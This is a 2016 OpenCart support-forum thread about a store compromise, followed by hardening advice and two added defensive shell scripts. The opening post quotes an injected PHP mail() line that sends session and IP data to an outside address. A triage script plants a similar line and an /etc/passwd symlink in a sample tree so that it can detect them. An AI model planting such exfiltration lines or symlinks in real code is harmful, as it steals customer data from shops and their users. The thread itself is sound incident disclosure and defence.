
Attempted hack v2.2

Posted: Sun Dec 11, 2016 10:18 am
by labeshops
Had an attempted hack that added a bunch of symlinks and also found a line embedded in OpenCart's system/library/cart/customer.php file

```php
// Line found injected into system/library/cart/customer.php, quoted as posted
// (including the stray closing brace that followed it).
mail('wuroikya@gmail.com', '♥ Talghima Gra3 [  '.$_SESSION['country1'].'  -  '.$_SERVER['REMOTE_ADDR'].' ]', $content,$head);
     }
```
I assume they were trying to steal customer information considering it was in that file. It broke the store so I found it pretty fast in that file, but wanted to let everyone know to watch out for this. I deleted all the symlinks and cleared caches and everything is fine again, but definitely watch out for it. Also changed all my passwords of course.
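As an added example (not code from the thread or from OpenCart), here is a small triage script for the two signals the post describes: symlinks that should not be in the web root, and a mail() call with a hard-coded address dropped into a core file. It builds a constructed sample tree (a clean copy and a "live" copy with the injection) so it runs offline; the paths, the `attacker@example.com` address and the assumption that you still have a clean copy of the release you installed are all mine.

```shell
#!/bin/sh
# Added example, not from the thread. Post-incident triage of a PHP web root
# for unexpected symlinks and mail() calls to a literal address. The sample
# tree below is constructed; on a real server point the functions at your
# deployed tree and at an untouched copy of the same OpenCart release.

# Every symlink under the tree. A stock OpenCart install ships none, so each
# line printed is something you must be able to explain.
find_symlinks() {
    find "$1" -type l
}

# PHP files whose mail() call has a literal e-mail address as the first
# argument. Legitimate cart mail uses the configured store address, not a
# string literal inside system/library.
find_hardcoded_mail() {
    grep -rlE "mail\([[:space:]]*['\"][A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]+['\"]" \
        --include='*.php' "$1"
}

# Files that differ from a clean copy of the same release (assumption: you
# kept the tarball you installed from). Anything listed is your edit or theirs.
diff_against_clean() {
    diff -rq "$1" "$2"
}

# --- constructed sample: a clean tree and a "live" tree carrying the injection
DEMO=$(mktemp -d)
CLEAN="$DEMO/clean"
LIVE="$DEMO/live"
mkdir -p "$CLEAN/system/library/cart" "$LIVE/system/library/cart"
printf '<?php\n// sends via the configured store address\nmail($this->config->get("config_email"), $subject, $content, $head);\n' \
    > "$CLEAN/system/library/cart/customer.php"
cp "$CLEAN/system/library/cart/customer.php" "$LIVE/system/library/cart/customer.php"
# planted exfiltration line, same shape as the one quoted above (address is made up)
printf "mail('attacker@example.com', 'subj', \$content, \$head);\n" \
    >> "$LIVE/system/library/cart/customer.php"
ln -s /etc/passwd "$LIVE/system/link-to-passwd"

echo "== symlinks =="
find_symlinks "$LIVE"
echo "== mail() with a literal address =="
find_hardcoded_mail "$LIVE" || true
echo "== differences from the clean copy =="
diff_against_clean "$CLEAN" "$LIVE" || true
```

The diff against a clean copy is the check that matters most: the grep only catches this particular shape of injection, whereas the diff lists every modified or added file, which is what you need before deciding whether a restore from backup (as the poster did) is sufficient.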

Re: Attempted hack v2.2

Posted: Sun Dec 11, 2016 5:11 pm
by angela
If there's a file in your site that you didn't put there, that wasn't an attempted hack; it was a hack.

Do you know how they were able to get that file onto your server? (If you're on a shared server, your host would know the method of operation).

If it were through OpenCart and not an unpatched OS/php version, a fix needs to be implemented to all of our carts asap.

Re: Attempted hack v2.2

Posted: Wed Dec 14, 2016 2:43 am
by labeshops
I said "attempted" since the hacker fouled up the code they tried to inject and it just caused an error rather than their getting any info.

Suspect they came through WordPress even though I had Wordfence and other security installed. Found some files in each of my 4 WP installations that I removed.

I just moved to a VPS and isolated my WordPress installations on their own cPanel accounts away from my OpenCart installation. I had actually planned to go to a VPS early next year, so just did it a little earlier than planned. Also rolled back to before the hack occurred, all with a big thanks to Evolve for helping me work through the issue. Great support as always.

Re: Attempted hack v2.2

Posted: Wed Dec 14, 2016 2:53 am
by angela
Oh I see, sorry - didn't really look at their code. :)

(Assuming this is your first VPS/dedicated server and you're on a Linux-based OS):
Now that you're on a VPS the onus is on you to keep the OS up-to-date, as well as any dependencies.
If you have a WHM account that'll simplify things greatly for you as you can do pretty much everything, short of OS & kernel updates from within the WHM admin.

If you don't already have it, utilizing CSF, logwatch, rkhunter and ClamAV are good starting points.
Also disable expose_php via php.ini
Turn off Apache server tokens
If you're willing to invest a bit of time testing, mod_security as well; but you'll need to thoroughly test your cart. Out of the box a lot of rules are triggered by OpenCart.

https://www.linode.com/docs/security/se ... frequently
https://documentation.cpanel.net/displa ... -+Security

WordPress would be my first guess at entry too. Definitely keep it (and all add-ons) up-to-date & isolated.

Side note: Simply creating a separate cPanel account for the WordPress installs won't guarantee they're isolated; make sure permissions are set properly (no chmod 777!) and disable shell access for them.
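As an added example (not from the thread), the file-based items in the post above can be audited and, for expose_php, fixed from a shell: expose_php in php.ini, ServerTokens in the Apache config, world-writable files under a web root, and which hosting accounts still have a login shell. The script constructs sample config files so it runs offline; the file paths, the account names and the mapping of "disable shell access" to a shell ending in noshell/nologin/false are assumptions of mine, and the package-level items (CSF, logwatch, rkhunter, ClamAV, mod_security) are not covered here.

```shell
#!/bin/sh
# Added example, not from the thread. Audits expose_php, ServerTokens,
# world-writable paths and login shells. Sample inputs below are constructed;
# on a real VPS point the functions at your php.ini, httpd.conf, web root
# and /etc/passwd (locations vary by distro and cPanel version).

# Prints "on" or "off". PHP defaults expose_php to On when the directive is
# absent, so a missing line is reported as on.
php_expose_setting() {
    v=$(grep -iE '^[[:space:]]*expose_php[[:space:]]*=' "$1" | tail -n 1 \
        | sed 's/^[^=]*=[[:space:]]*//; s/[[:space:]]*$//' | tr 'A-Z' 'a-z')
    case "$v" in off|0) echo off ;; *) echo on ;; esac
}

# Sets expose_php = Off in place (appends the directive if it was missing).
disable_expose_php() {
    if grep -qiE '^[[:space:]]*expose_php[[:space:]]*=' "$1"; then
        sed -i.bak 's/^[[:space:]]*[Ee][Xx][Pp][Oo][Ss][Ee]_[Pp][Hh][Pp][[:space:]]*=.*/expose_php = Off/' "$1"
    else
        printf 'expose_php = Off\n' >> "$1"
    fi
}

# Effective ServerTokens value; Apache defaults to Full when it is unset.
# "Prod" is the setting that stops advertising module and OS versions.
apache_server_tokens() {
    v=$(grep -iE '^[[:space:]]*ServerTokens[[:space:]]+' "$1" | tail -n 1 | awk '{print $2}')
    echo "${v:-Full}"
}

# World-writable files and directories under a web root (the "no chmod 777").
world_writable() {
    find "$1" -perm -0002 \( -type f -o -type d \)
}

# Non-system accounts (UID >= 1000) whose login shell still allows a shell.
# Assumption: a disabled account ends in nologin, false or cPanel's noshell.
accounts_with_shell() {
    awk -F: '$3 >= 1000 && $7 !~ /(nologin|false|noshell)$/ {print $1 ":" $7}' "$1"
}

# --- constructed sample inputs showing the weak settings
DEMO=$(mktemp -d)
printf '[PHP]\nexpose_php = On\nmemory_limit = 128M\n' > "$DEMO/php.ini"
printf 'ServerTokens Full\nServerSignature On\n' > "$DEMO/httpd.conf"
printf 'root:x:0:0:root:/root:/bin/bash\nshop:x:1001:1001::/home/shop:/usr/local/cpanel/bin/noshell\nwp1:x:1002:1002::/home/wp1:/bin/bash\n' \
    > "$DEMO/passwd"
mkdir -p "$DEMO/public_html/image/cache"
chmod 777 "$DEMO/public_html/image/cache"
touch "$DEMO/public_html/config.php"
chmod 644 "$DEMO/public_html/config.php"

echo "expose_php: $(php_expose_setting "$DEMO/php.ini")"
echo "ServerTokens: $(apache_server_tokens "$DEMO/httpd.conf")"
echo "world-writable under public_html:"
world_writable "$DEMO/public_html"
echo "accounts that still have a shell:"
accounts_with_shell "$DEMO/passwd"

disable_expose_php "$DEMO/php.ini"
echo "expose_php after fix: $(php_expose_setting "$DEMO/php.ini")"
```

Only expose_php is corrected automatically; ServerTokens, permissions and shells are reported so you can change them through WHM or by hand, since a blind chmod or shell change on a cPanel account can break the cart you are trying to protect.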